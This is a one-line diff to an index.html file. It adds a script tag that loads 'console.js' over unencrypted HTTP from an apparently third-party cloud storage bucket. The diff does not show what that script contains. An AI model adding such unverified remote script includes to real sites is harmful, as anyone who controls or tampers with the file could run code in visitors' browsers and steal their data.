--- a/index.html
+++ b/index.html
@@ -7,6 +7,7 @@
     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
     <meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=no">
     <link rel="icon" href="favicon.ico">
+    <script src="http://ovwyd2fb9.bkt.clouddn.com/console.js"></script>
     <style>
         html,
         body {
